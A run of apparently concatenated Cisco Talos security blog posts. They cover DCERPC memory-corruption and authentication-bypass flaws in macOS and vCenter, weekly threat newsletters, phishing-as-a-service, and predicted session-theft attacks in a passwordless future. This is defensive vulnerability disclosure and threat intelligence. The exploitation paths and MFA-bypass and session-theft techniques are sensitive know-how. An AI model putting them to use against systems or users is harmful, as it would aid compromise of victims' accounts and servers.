The code above first checks if buff_dealloc isn’t NULL and then proceeds to dereference buff_dealloc as a function pointer. It is possible to create a condition where buff_dealloc isn’t a valid deallocation routine but, in fact, contains uninitialized or previously used data. With proper memory layout control, this can lead to a direct code execution hijacking as observed in the debugger:
MSRPC protocol has a fairly complex state diagram which results in implementations that have complex state machines and DCERPC is no exception. There exists a sequence of DCERPC packets that can short-circuit this state machine and result in the premature freeing of a packet backing buffer. Pointers to freed memory are subsequently reused. This constitutes a use-after-free condition that can be exploited to achieve arbitrary code execution. Once again, we can rely on function pointers inside structures to potentially hijack process execution:
In this scenario, the freebuf pointer points to freed memory. If this free memory is reallocated and put under attacker control prior to reaching a call to fragbuf_dealloc, program execution can potentially be redirected to arbitrary code.
Apple DCERPC array marshaling uninitialized memory disclosure vulnerability
We mentioned already how useful uninitialized memory leaks can be when trying to bypass exploitation mitigations. TALOS-2022-1688 is another example of a situation where part of a structure can remain uninitialized due to complex paths through the functions. This particular vulnerability lies in the code that is responsible for marshaling responses to RPC calls. To reach the vulnerable code, and demonstrate the vulnerability, a suitable target service was necessary. The spotlight mdssvc service reachable through rpcsvchost on macOS has a function that has suitable input/output parameters that look like this in the corresponding reverse-engineered IDL:
The vulnerability can be abused through the out parameter that is a variably sized array of type string: share_path. With proper memory layout control, potentially arbitrary amounts of out-of-bounds data can be leaked back to the attacker.
Apple DCERPC fixed array use after free vulnerability
Another vulnerability deep in the code is responsible for marshaling/unmarshaling of input/output parameters. The core of it is that the same data structure is used in both unmarshaling of incoming input parameters (when performing an RPC call), and in marshaling output parameters when constructing a reply. This vulnerability lies in the fact that there exists a path where memory is freed without updating the structure that points to it, which can lead to use-after-free. One possible path to trigger this vulnerability would be through the invocation of an RPC method that has a fixed-size array as an output argument. One candidate for such a function is netr_ServerReqChallenge, or function 0x04 of NETLOGON service (on macOS, NETLOGON is implemented in netlogon.bundle). From IDL, the data structure that we can abuse is:
The use-after-free can further be abused to corrupt memory.
DCERPC association groups use-after-free vulnerability
Another vulnerability that affected both macOS and vCenter and stems from temporal issues when handling multiple clients. Connections are handled in batches which can get freed as clients disconnect or sessions are terminated. A discrepancy when handling those can lead to a linked list pointing to freed memory which can result in heap memory corruption.
==72659==ERROR: AddressSanitizer: heap-use-after-free on address 0x616000020488 at pc 0x7ffff6e6ac40 bp 0x7fffc8f60c70 sp 0x7fffc8f60c68
WRITE of size 8 at 0x616000020488 thread T92
#0 0x7ffff6e6ac3f in rpc__cn_assoc_grp_create ../../../dcerpc/ncklib/cnassoc.c:4958
#1 0x7ffff6e6b059 in rpc__cn_assoc_grp_alloc ../../../dcerpc/ncklib/cnassoc.c:5086
#2 0x7ffff6e993d9 in do_assoc_req_action_rtn ../../../dcerpc/ncklib/cnsassm.c:2006
#3 0x7ffff6e9b4b2 in do_assoc_action_rtn ../../../dcerpc/ncklib/cnsassm.c:3461
#4 0x7ffff6ea5d69 in rpc__cn_sm_eval_event ../../../dcerpc/ncklib/cnsm.c:771
#5 0x7ffff6ea980a in _RPC_CN_ASSOC_EVAL_NETWORK_EVENT ../../../dcerpc/ncklib/cninline.c:129
#6 0x7ffff6e933c1 in receive_dispatch ../../../dcerpc/ncklib/cnrcvr.c:1256
#7 0x7ffff6e8d7d1 in rpc__cn_network_receiver ../../../dcerpc/ncklib/cnrcvr.c:348
#8 0x7ffff6cc73fd in proxy_start ../../../dcerpc/libdcethread/dcethread_create.c:100
#9 0x7ffff631ff86 (/lib/libpthread.so.0+0x7f86)
#10 0x7ffff621062e in __clone (/lib/libc.so.6+0xf362e)
The address sanitizer log shows a crash due to an attempted write to invalid memory.
VMware vCenter Server DCERPC save_sec_fragment out-of-bounds pointer vulnerability
Unlike other presented vulnerabilities which leak data or cause memory corruption, this vulnerability has a potential for authentication bypass. The heart of the vulnerability is in the way the authentication trailer is calculated:
auth_tlr = header + frag_len - (auth_len + 8)
All the above arithmetic is based on packet data, is under the control of the attacker, and is unchecked. Thus, the attacker can arbitrarily set the auth_tlr pointer to point beyond the limits of the buffer. Further code investigation reveals that by abusing this vulnerability, an attacker could direct the code to use arbitrary out-of-bounds data for authentication. It is conceivable that, on a server used by multiple clients, out-of-bounds data could be made to point to valid authentication data from a different client which would affect confidentiality.
This vulnerability is only present in the vCenter version of the DCERPC codebase.
Coverage
The following Snort rules will detect exploitation attempts against this vulnerability: 60934 - 60941, 60966, 60967, 60970, 60971, 61193 and 61201. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.
Welcome to this week’s edition of the Threat Source newsletter.
Although we can probably largely consider the COVID-19 pandemic “over,” many relics from the peak of lockdown and concerns over the virus are still around in mid-2023. It’s still impossible to get a doctor’s appointment quickly, but many restaurants have embraced al fresco dining and QR codes are back.
At one point I had totally written off QR codes as of 2010-ish, but now they’re all over restaurant menus, cash registers, tip jars and advertising. This started during the pandemic as a touch-free way of interacting with consumers and seems to be sticking around even though the days of indoor seating capacities are over.
QR codes have always served as a way for bad actors to spread malware or even your friendly neighborhood prankster to share Rick Astley’s most famous music video. But recently I discovered several “novel” ways in which bad guys are trying to capitalize on society’s newfound trust in QR codes.
Two months ago, Bleeping Computer reported on fake parking tickets floating around major U.S. and U.K. cities that had phony QR codes on them designed to trick users into “paying” a parking ticket they didn’t owe. That same week, there were also reports of phony Microsoft Word documents being sent via email to targets that contained QR codes claiming to be from the Chinese Ministry of Finance, thus bypassing traditional email security that usually scan things like links and the body copy in an email itself.
The local CBS station in Tampa Bay, Florida also came across a fake Amazon advertisement in March that claimed to enlist people who received a postcard to test out new products. When opened, the site on the other end of the QR code asked for the target’s personal and contact information.
I figured we’d be past the days of attackers just slapping QR codes onto random things, but I also thought we were done with QR codes altogether three years ago. So this serves as a PSA to not just scan any QR code you see in the wild “just because.”
Or, if you’re unsure about the origins of a QR code, iOS and Android phones will show a snippet of a URL that the QR code is sending the user before you click on it, so it’s important to double-check that the URL is where you intended on heading (ex., amazon.com). Either that or just ask for a paper menu at the restaurant.
The one big thing
Cisco Talos has identified multiple versions of an undocumented malicious driver named “RedDriver,” a driver-based browser hijacker that uses the Windows Filtering Platform (WFP) to intercept browser traffic. This threat appears to target native Chinese speakers, as it searches for Chinese language browsers to hijack. Additionally, the authors are likely Chinese speakers themselves. If installed, the malicious driver can hijack and spy on web traffic, potentially redirecting it to a source of the attacker’s choosing.
Why do I care?
This is a concrete example of a recent trend Talos has been following of threat actors taking advantage of a Windows policy loophole that allows the signing and loading of cross-signed kernel mode drivers with signature timestamp prior to July 29, 2015. We have observed over a dozen code-signing certificates with keys and passwords contained in a PFX file hosted on GitHub used in conjunction with these open-source tools. By forging signatures on kernel-mode drivers, attackers can bypass the certificate policies within Windows.
So now what?
Microsoft has blocked all certificates discussed in Talos' blogs posted this week and released an advisory on the matter as part of Patch Tuesday. Talos recommends blocking the certificates mentioned in this blog post, as malicious drivers are difficult to detect heuristically and are most effectively blocked based on file hashes or the certificates used to sign them. Comparing the signature timestamp to the compilation date of a driver can sometimes be an effective means of detecting instances of timestamp forging. Specifically, for RedDriver, there are a series of new Cisco Secure product protections in place to detect and block the malicious driver.
Top security headlines of the week
The list of companies affected by the massive MOVEit mass hack continues to grow, and now includes international hotel chain Radisson and GPS company TomTom. Clop, the ransomware group behind the attack against the MOVEit data transfer software that eventually led to data breaches at more than 100 organizations, added more companies to its leak site this week. Commercial banks Deutsche Bank and Commerzbank are also among the newest victims, with both companies reportedly having clients’ names and account numbers. The parent company of Radisson also confirmed that a “limited number of guest records” were accessed, though it did not provide an exact number. Clop originally used a zero-day vulnerability that’s since been patched to access MOVEit software instances and then steal certain information from users. One threat analyst at New Zealand anti-virus maker Emsisoft estimated that there are now more than 270 businesses affected across the globe, including 17 million individuals. (Tech Crunch, Bloomberg)
With Meta’s new microblogging platform Threads taking off, users and privacy advocates are criticizing its privacy and data collection policies. Meta, which is the parent company behind Facebook and Instagram, launched Threads last week to much fanfare and gained millions of new users in the first few hours of the app’s existence. However, the app has yet to launch in the European Union because it violates several GDPR policies. Threads’ privacy policy states the app has access to GPS location, cameras, photos, IP information, the type of device being used and device signals including “Bluetooth signals, nearby Wi-Fi access points, beacons and cell towers.” In general, Meta seems to collect more personal information on Threads users compared to other platforms, though not necessarily more than Facebook and Instagram, Meta’s other major platforms. (The Guardian, CPO Magazine)
Despite major efforts from international governments and the private sector to combat ransomware, payments to threat actors are set to hit a new record in 2023. A new report from blockchain company Chainanalysis reports that ransomware victims have paid adversaries $449.1 million in the first six months of this year, after that number didn’t even hit $500 million in 2022. If this pace continues, 2023 would be the second-most profitable year ever for ransomware groups behind 2021. Security researchers believe the dip in 2022 could be contributed to several factors, including Russia’s invasion of Ukraine disrupting some major APT groups and new decryption software from government agencies and private companies that can return victims’ files for free. Chainanalysis analysts state in the report that big-game hunting is largely contributing to this year’s revenue — in these cases, threat actors target major corporations that likely have the funds to pay large, requested ransom payments. (Wired, Bleeping Computer)
Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.
Most prevalent malware files from Talos telemetry over the past week
Implementing a threat intelligence program that meets the definition of threat intelligence control as described in ISO/IEC 27002:2022 — a set of standards set forth by the International Organization for Standardization — is not onerous.
The ISO/IEC 27002 standard describes a non-exhaustive list of security controls that organizations can implement on their own or as part of an ISO/IEC 27001-compliant cybersecurity program.
The guidance within ISO 27001 identifies which security controls are appropriate, while ISO 27002 describes the controls in detail and how they can be implemented. Threat intelligence is a recent addition to the controls having been included in the 2022 edition of the standards, which are adopted by more than 160 countries around the world.
What is threat intelligence?
Threat intelligence is simply information about threats. The goal of threat intelligence is to help decision-makers make better decisions by being better informed about current threats and those they may face in the future.
In a world where the risks posed by the ever-changing cyber threat landscape are in constant flux, yet resources are constrained, deciding which security measures should be deployed depends on risk appetite and an understanding of the nature of the threats. Effective threat intelligence informs decision-makers in a timely manner about how the threat landscape is changing and enables management to act to counter these threats.
Acting against threats may be as simple as updating a block list or require considering where investments in new countermeasures should be made. The standard states that the purpose of threat intelligence should be to “provide awareness of the organization's threat environment so that the appropriate mitigation actions can be taken.” The details of exactly what actions are required are for the organization’s decision-makers to choose.
Obtaining threat intelligence
Few organizations routinely generate intelligence from their own data. Most organizations receive and make use of intelligence published from third parties such as government agencies, specialist providers or collaborative groups.
At Talos, we pride ourselves on the quality of the intelligence we publish. We publish intelligence on the significant threats that we identify on our blog and provide a summary of recent key threats in our weekly Threat Source newsletter.
Organizations can collect this intelligence, review the threats described, consider if and how the threat is relevant to them, and the necessity of making any potential additional mitigations. Circulating this information to the relevant people provides vital awareness of current threats, and provides actionable intelligence if changes need to be made to counteract these.
A threat intelligence program
At its simplest, a rudimentary threat intelligence program consists of the program’s objectives, the sources from where intelligence will be gathered, the frequency of that collection, and what will we do with the gathered information.
The wording of ISO/IEC 27002 provides an outline for the program’s potential objectives. Threat intelligence should be: “relevant, insightful, contextual, actionable.” The collection of intelligence that satisfies these four requirements will almost certainly be useful to wider cybersecurity activity.
Setting out the sources of intelligence may be as easy as listing the providers of threat intelligence that are already consulted, and how often they will be consulted. Subscribing to the Talos weekly newsletter provides information about the most prevalent malware.
This intelligence can be used to identify which (if any) of the organization’s defense systems detected the threat. Reflecting on if the threat could have been detected earlier and passing any recommendations to management constitutes a viable threat intelligence program.
The Talos Threat Spotlight posts and Quarterly Trends reports provide details of threats and the techniques used by threat actors. Analysing these and considering how (or if) such malicious strategies would be detected and blocked, or if additional mitigations are required, and passing this information to management would also be an effective use of threat intelligence.
Further Controls
Additional controls defined in ISO/IEC 27002 can form part of the threat intelligence process or benefit from an intelligence input. Relevant controls include:
5.6 Contact with special interest groups - being part of a community sharing experiences and intelligence with industry peers allows the further collection of intelligence and contextualization of that information.
8.7 Protection against malware & 8.23 Web filtering – informing users about the current threats that they are likely to face, providing information about they can identify threats and helping protect systems helps improve the organization’s security posture.
8.8 Management of technical vulnerabilities – prioritizing the mitigation and patching of vulnerabilities based on their potential and current risk of abuse requires identifying the assessed severity of a vulnerability and how this may change.
8.15 Logging & 8.16 Monitoring activities – determining the system information to log, store and query allows malicious behavior to be uncovered, if threat intelligence is applied to understand how threats may manifest themselves within log data.
Whether known as commodity malware or “as-a-service,” threat actors have long been turning to their fellow adversaries in the hopes of selling off their tools and opening a new stream of revenue.
When used legitimately, as-a-service software is when a third-party company offers its software to another company based on a license that is renewed frequently (mostly monthly or yearly) for a fee. The software is centrally hosted on that third-party company’s servers. Think of cloud storage solutions like Dropbox or Plex, for example.
Threat actors have been using this business model for a decade-plus, originally known as commodity malware. This is when threat actors create a suite of malware tools and offer them up for sale on illicit websites. It can range from asking “customers” to pay a monthly fee for access to this set of tools to use in cyber attacks, or users can even pay the original creators to distribute the malware on their behalf and manage the infection.
Recently, this model for threat actors has come to be known as the “as-a-service" model, borrowing the term from the growing trend in the tech industry.
Ransomware-as-a-service is a relatively new version of these commodity groups, such as DarkSide, known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. consumers.
But other bad actors have since adopted this businesses model, offering every from command and control servers to phishing bots-as-a-service. There are a few reasons why attackers may opt to pay for an as-a-service malware tool for their chosen campaign:
As-a-service saves attackers time. When they pay for someone else’s malware kit, whether it be ransomware or a phishing bot, they don’t have to invest time, money or labor to write their own malicious code or tools and instead can hop right into deploying the malware.
For the actors and groups who originally created the malware, it is a more reliable income stream for them. Usually, they’d have to hope a successful attack leads to a ransom payment or some sort of other financial windfall. Instead, they can make money by marketing their services to other bad actors for a fee.
Bad actors who want to get into the cyber attack business need little to no technical skills to get started. When an attacker pays for an as-a-service malware, they often get an individual login with dedicated customer support, much like any user would with a legitimate piece of software. This way, they can ask questions and receive help if they get stuck during the deployment of the malware. This means that, conceivably, anyone with interest could get involved in starting a cyber attack.
As Nick Biasini explained in a past episode of Talos Takes, name recognition also plays a major part in the rising popularity of this business model. Lesser-known threat actors want to piggyback off having a big name associated with them, like DarkSide, to intimidate their actors or lend more credence to the effectiveness of their threats.
Notable example: Greatness
Cisco Talos researchers recently discovered Greatness, one of the most advanced phishing-as-a-service tools ever seen in the wild. Our analysis indicates that attackers may have been using attackers since mid-2022.
Greatness offers the ability for users to bypass targets’ multi-factor authentication protections, IP filtering and integration with Telegram bots. Greatness incorporates features seen in some of the most advanced PaaS offerings, such as multi-factor authentication (MFA) bypass, IP filtering and integration with Telegram bots.
Greatness, for now, is only focused on Microsoft 365 phishing pages, providing its affiliates with an attachment and link builder that creates highly convincing decoy and login pages. It contains features such as having the victim’s email address pre-filled and displaying their appropriate company logo and background image, extracted from the target organization’s real Microsoft 365 login page. This makes Greatness particularly well-suited for phishing business users.
Any Greatness affiliates don’t need a specific set of skills. All they need to do is deploy and configure the provided phishing kit with an API key. If used successfully, the attacker can set up a proxy Microsoft 365 authentication system and steal a victim’s authentication credentials or cookies with a “man-in-the-middle" attack.
Greatness is specifically designed to work in a standardized way so that the experience is the same for each customer who buys into the service, potentially allowing anyone with a moderate amount of technical ability to carry out advanced, convincing phishing attacks.
Since as-a-service or commodity malware can include all types of malware, it can be tough to provide specific advice for detection and prevention. For Greatness specifically, anyone implementing multi-factor authentication should opt for code-based authentication through their MFA app of choice, such as Cisco Duo, rather than the easier-to-break method of a simple “yes” or “no” push notification.
Since the beginning of July, Cisco Talos has published 40 vulnerability advisories affecting a range of software and hardware, including the Microsoft Edge browser.
In our new series called “Vulnerability Roundup,” we’ll be recapping the vulnerabilities we recently disclosed to provide readers with an overview of what the issue is, how they can remediate and what the potential implications are for users. Our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
A memory corruption vulnerability exists in the JavaScript implementation of the Adobe Acrobat PDF engine that the Microsoft Edge web browser uses. Talos tested and confirmed that Edge, versions 112.0.1722.58 and 114.0.1776.0 Canary, are affected by this vulnerability.
An attacker could trigger this vulnerability by tricking a user into opening a specially crafted PDF in the browser. This could trigger a type confusion vulnerability, which could allow the adversary to write to arbitrary memory. Microsoft patched this issue on July 13.
The following Snort rules will detect exploitation attempts of this vulnerability: 61874 and 61875. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall or Snort.org.
Talos disclosed multiple vulnerabilities in these products despite no official fix from Milesight, in adherence to Cisco’s vulnerability disclosure policy. Milesight did not respond appropriately during the 90-day period as outlined in the policy.
We have a complete technical breakdown of how an attacker could string some of these vulnerabilities together to completely compromise the UR32L router and MilesightVPN.
In all, Talos released 22 security advisories regarding Milesight products this month, nine of which have a CVSS score greater than 8, associated with 69 CVEs.
Heap buffer overflow vulnerabilities in Diagon text translator
Our researchers discovered two vulnerabilities in the Diagon text interpreter that could cause heap-based buffer overflow conditions. Diagon translates Markdown into several formats, including latex, planar graph and tables.
The Diagon interpreter translates a Markdown text sequence diagram to a graphical sequence diagram.
An adversary could exploit TALOS-2023-1745 (CVE-2023-31194) by tricking the user into opening a specially crafted Markdown file, thereby causing an improper array index validation. TALOS-2023-1744 (CVE-2023-27390) could be exploited the same way, but in this case, leads directly to remote code execution. Diagon’s maintainer released an update to address these vulnerabilities.
The roadmap goes a long way toward actualizing a plan the administration released earlier this year and sets tangible goals and programs to put many of these initiatives into action. But because nothing ever moves quickly in government, this roadmap and the associated plan are already hitting a few roadblocks.
First, there’s the ever-present partisan politics. Republican state lawmakers are backing a legal challenge in the court systems to block an Environmental Protection Administration rule that asked local water systems to evaluate their current cybersecurity systems and protections while conducting sanitation surveys. To me, simply asking critical infrastructure to consider these factors as part of their normal processes seems like a non-issue, but the U.S. Appeals Court has put a hold on this rule for the time being (though it didn’t give a precise reason at the time of its ruling).
If lawmakers are going to hash these types of regulations in court every time something new pops up, we’ll never reach the point of these rules actually being implemented.
Two leading Republican members of the U.S. House came out hours after the Biden administration released the roadmap, saying they would use their respective House panels to, “exercise strict oversight on CISA’s efforts” to implement many of the policies outlined.
Regardless of which side of the political spectrum you fall, cybersecurity should be something our lawmakers can all agree on.
Say these arguments extend through the 2024 election — what happens if control of the White House or Congress switches between parties? And then that changes again in 2026? Change is slow, so none of these initiatives are going to be implemented overnight.
If our government can’t come to any sort of agreement about the importance of cybersecurity, and how to encourage stronger public-private partnerships to reach the country’s goals, this is just going to be another partisan issue that’s held up by legal challenges, budget negotiations, hearings and verbal discourse. And by the time that all subsides, the people in charge of outlining and implementing these cybersecurity goals could have very well changed.
So, forgive me if I’m coming off as a bit skeptical that anything in this roadmap will end up passing any mile markers.
The one big thing
Our researchers recently discovered a threat actor conducting several campaigns against government entities, military organizations and civilian users in Ukraine and Poland. Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access. The activity we analyzed occurred as early as April 2022 and as recently as earlier this month, demonstrating the persistent nature of the threat actor. The final payloads include the AgentTesla remote access trojan (RAT), Cobalt Strike beacons and njRAT.
Why do I care?
If you’re a user in Ukraine or Poland, especially someone working in the government or military sectors, this is a clear-cut example of a spam campaign targeting this population. For those who fall outside of that demographic, it’s interesting that this group is still relying on the user enabling macros in Office, since Microsoft disabled those by default earlier this year. These are also highly targeted emails with (relatively speaking) convincing lures, so whoever is behind these is not to be ignored.
So now what?
There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns. Other Snort rules and detection content can prevent the execution of the malware used as the final payload. Our researchers have also published examples of the types of lure images and documents used in the initial phishing emails so users can know what to be on the lookout for.
Top security headlines of the week
Chinese state-sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies, including the State Department. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a detailed timeline on the campaign, stating that an investigation from Microsoft revealed that “advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data” after users reported suspicious activities in their Microsoft 365 cloud environment. While the full scope of the hack is still under investigation, reports indicate that the actors were primarily trying to steal sensitive information. While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited, the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users. “Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse,” the report states. (CISA, CNN)
Popular tax preparation software companies are under fire from lawmakers for allegedly sharing personal information with social media sites, including Google and Meta. Several Democratic lawmakers released a report last week that accused TaxAct, H&R Block and TaxSlayer of embedding Meta and Google’s tracking pixels on their sites, potentially violating U.S. law and sharing taxpayers’ information with those companies. The report says the data was kept anonymous, but the companies could “easily” use the information to identify individuals or create targeted advertising for them. The report has also renewed calls for the Internal Revenue Service to offer its own, free online tax filing service for U.S. consumers. (Vox, USA Today)
Apple had to roll back and then re-release a security update that addressed an actively exploited vulnerability in WebKit. Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023-37450, a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use. However, users reported that the fix was causing Safari to not connect correctly to major websites like Facebook, Instagram and Zoom, leading Apple to pull back the patch. Since then, Apple released a new fix for iOS, iPadOS and macOS that reliably fixes the vulnerability again. Though few details are currently available about CVE-2023-37450, Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content. (Forbes, Gizmodo)
Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.
“Most prevalent malware files” is taking a break this week for maintenance.
By Thorsten Rosendahl and Tiago Pereira, with contributions from Matthew Miller.
The industry has come a long way in terms of improving how we make user authentication more secure. From the most basic concept of relying on usernames and passwords for authentication to enabling multi-factor authentication (MFA) for additional security, we are now embracing a shift toward passwordless logins and/or passkeys that are designed with security in mind from the beginning.
We anticipate that passwords may disappear in a not-so-distant future, with actors likely to shift away from basic phishing or other attacks that target passwords, toward post-authentication session theft, or the weaker registration, recovery, and revocation processes.
We can broadly group the distinct types of authentication as follows:
Password-based authentication is the weakest type of authentication, and it is vulnerable to several types of attacks, such as brute force, phishing and password stuffing, in which an attacker tries to use credentials that are obtained from a breach in some online service to log into other online services and applications.
Multi-factor authentication (MFA) is an authentication method whereby a user must present two or more factors to successfully pass an authentication. MFA, when passkeys are not one of the factors, protects the user against several attacks, most notably those that rely on password guessing (e.g., brute force and password spraying) and those based on credential leakage from third-party websites (e.g., password stuffing). However, it does not protect against all phishing attacks.
An attacker can redirect a user to a legitimate-looking phishing website that proxies all the information between the victim, itself, and a legitimate website. Once the victim unknowingly visits the malicious site, they are prompted to submit their credentials and accept an MFA authentication request. After this happens, the legitimate website will generate a session ID that the attacker can steal and use to access the application posing as the victim.
Device-bound passkeys are a form of passwordless authentication based on the open FIDO2 (Fast Identity Online) standard that is supported by most modern browsers and operating systems and allows users to log into websites simply clicking a button or touching a biometric reader on the device or on a mobile device. This wide support and its usability features make passkeys a viable alternative to even usernames and passwords that are combined with MFA.
In short, instead of putting the burden on the user to create and memorize unique, complex passwords for each service they use, FIDO2 credentials provide a cryptographic solution that offers stronger authentication than common MFA techniques (SMS, OTP, Push) allow. FIDO2 uses a public/private key pair, where the private key is stored on the user’s device, and the public key is registered with the online service provider.
This mechanism has several advantages over password-based and MFA authentication:
It is phishing resistant — The browser is responsible for checking if the authenticator contains passkeys for a given URL. For example, when opening a phishing website, the browser would find that the authenticator does not have a stored credential for it, so it would not provide the user a way to login.
It is resistant to credential stuffing – The public key is not a secret, and it is unique for each website. Even if a third-party website is breached and the public key stolen, it cannot be used by attackers to authenticate as the user.
Private keys can be protected by hardware — The private key can be forced to be protected by a hardware module from which it cannot be exported. The private key is only used within that hardware module to create a signature and it is never exposed to a potentially compromised operating system. However rare, there have been vulnerabilities found in hardware modules that may allow attackers to steal private keys.
It is more user-friendly - Users no longer must remember, manage, or write passwords. Instead, the user only needs a couple of clicks to quickly log in via a ceremony handled by the browser.
Although FIDO2 has many advantages over other means of authentication, it does not change how the application session mechanism works. Therefore, on a compromised device, an attacker can still steal the session ID post-authentication and use it to access the application, posing as the user.
Synced passkeys, also known as FIDO2 multi-device credentials, are like regular FIDO2 credentials, but they can be copied between user devices, allowing a user to only register once with a relying party and synchronize their key across all his devices. This is a significant step toward the adoption of passwordless authentication, as it minimizes the risk that the user loses access to their private keys and avoids the trouble of having to register and manage multiple devices and keys.
However, this increase in usability comes at a cost in security. The need to copy private keys to the cloud and to other devices means that they can be compromised if an attacker is able to register a new device posing as the victim or if the passkey implementation allows them to be stolen from the operating system memory or disk.
How phishing-resistant authentication could change the threat landscape
Although it will likely take several years for passwordless authentication to become widely adopted, and it is likely that passwords will be around for a long time, some of the most popular and most targeted applications may adopt it in the near future. Removing passwords from even a few dozen key web applications is likely to affect the threat landscape.
Targeting registration, recovery and revocation process flaws
Authentication is only one part of a larger identity management process. As much as phishing-resistant authentication is a significant increase in web application security, there are processes that must exist to allow the user to be able to use passwordless authentication, in particular, registration, revocation and recovery. This could lead to some changes in the way attackers use phishing to obtain access to target applications. For example:
Phishing for cloud providers – What happens when you lose access to all your devices at the same time? The answer is usually that the cloud provider allows a user to log in with a less secure method, which may be phishable. Because this fallback system exists, attackers will try to phish the users, leading them to provide all the details needed to recover from a scenario in which all device access was lost.
Phishing for password managers – As password managers start to store passkeys, they may become a larger target for phishing attacks, as they are the “master key” to obtaining phishing-resistant credentials. Like cloud providers, most password managers allow users to use MFA when installing it on a new device. This means that, ironically, in a passwordless future, it is possible that password managers will become a bigger target for phishing attacks.
Phishing for email providers – It is common to send “magic links” to a registered user email address that, when clicked, takes the user to a page where his password can be reset. The same system can be used for passkey re-registration. This could make email providers an even more common target for phishing attacks, as they become a way to bypass the phishing-resistant authentication on other targeted applications.
Targeting sessions, not authentications
Phishing-resistant authentication eliminates attacks that steal login credentials, leaving post-auth session IDs as the most valuable assets. Consequently, it is possible that attacks targeting session IDs will increase in popularity. These are some examples of ways the session could be attacked that could see an increase as passwords start to disappear:
Attacks based on bookmarklets – Bookmarklets are a feature of web browsers that allow JavaScript code to be saved as a bookmark. When the user clicks on the bookmark, the code is executed in the context of the open browser page. One example of this is a recent attack where bookmarklets were used to steal the Discord token from users of several Discord communities focused on cryptocurrency.
Attacks involving the clipboard – Tricking a user into executing malicious JavaScript or system commands by copy-pasting them from a website into the address bar, browser developer tools, or even the terminal can be used to steal session IDs from the browser or from the file system. This can happen as a result of social engineering, such as when users are following a tutorial that involves copy-paste code from a webpage. As a way to make these attacks more effective, pastejacking can be used to replace apparently innocuous code copied from a webpage with malicious code, tricking even more advanced users.
Browser-based malware changes – As session IDs increase in value, malware focused on the browser (for example, intercepting browser communications, injecting code into web pages or instrumenting hidden browser windows) may be subject to changes that assist new attacks and malicious business models. For example, adding features such as keeping sessions alive once they are stolen or proxying attacker HTTP requests within the context of the victim browser sessions.
Although not a threat landscape change, as session theft, becomes a major vector of compromise, it is possible that session security is increased, leading to bigger changes. Several session protection techniques that exist today may become more widely adopted, including regenerating the session ID frequently during an established session and reducing the session timeout or denying access to the session id from JavaScript. Much like what has happened to authentication, new standards could be developed that focus on the protection of web sessions.
Cybercrime business models adapt to the change
Many of the passwords that attackers are currently harvesting will be rendered obsolete with the adoption of passwordless authentication. This may cause changes both in malware and in cybercriminal’s business models built around selling access to compromised accounts:
Malware-based attacks may increase – Criminals are not likely to give up entirely because phishing has become harder or impossible. The groups that are currently dedicated to phishing could be forced to take the next step and focus on malware-based attacks. This shift could result in an increase in malware-based attacks, using the same distribution channels that phishing groups are used to (e.g., email or instant messaging).
Business models around selling compromised accounts may change – To take advantage of the stolen session IDs, attackers will have to act quickly while the session is active. As selling or taking advantage of valid session IDs becomes harder, attackers will adapt. We are already seeing signs of this adaptation. For example:
Phishing kits commonly make use of telegram bots to allow attackers to react faster when a new session ID is stolen.
The dark web Genesis market, which is back up again after being taken down by law enforcement a few months ago, specializes in selling “bots” which is the terminology the market owners used to call a package with a victim’s browser credentials’ cookies and fingerprints. To make this data easier to use, the market provides a specialized browser and Chrome extension to its customers, so they load the purchased “bot” data and easily use the authenticated sessions of each purchased bot. The user has the possibility of using the victim’s browser as a proxy, to make the abuse even harder to detect.
As criminals focus on sessions and these become increasingly more secure, the business models can adapt even further. For example, instead of selling stolen sessions, attackers could sell access to automated malicious actions to be triggered each time a session is compromised to the highest bidder, like high-frequency trading used in stock markets.
Web application vulnerability value increase – Web applications, just like any other software, can contain vulnerabilities introduced during development. Many of these allow an attacker to steal valid sessions or perform malicious actions directly without targeting the session. It would not be surprising if, with the unavailability of phishing as an attack vector, web app vulnerabilities became more commonly traded on underground forums and saw their value increase.
While the exact predictions in this post may or may not ever take place, passwordless authentication is gaining traction and it is certainly in the future of web authentication. Inevitably it will bring changes to attack techniques for which we should prepare sooner rather than later.
Cisco Talos Incident Response (Talos IR) responded to a growing number of data theft extortion incidents that did not involve encrypting files or deploying ransomware, a 25 percent increase since last quarter and the most-observed threat in the second quarter of 2023.
In this type of attack, threat actors steal victim data and threaten to leak or sell it unless the victim pays varying sums of money, eliminating the need to deploy ransomware or encrypt data. This differs from the double-extortion ransomware method, whereby adversaries exfiltrate and encrypt files and demand payment for victims to receive a decryption key.
Ransomware was the second most-observed threat this quarter, accounting for 17 percent of engagements, a slight increase from last quarter’s 10 percent. This quarter featured the LockBit and Royal ransomware families, which Talos IR has observed in previous quarters. Talos IR also observed several ransomware families for the first time, including 8Base and MoneyMessage.
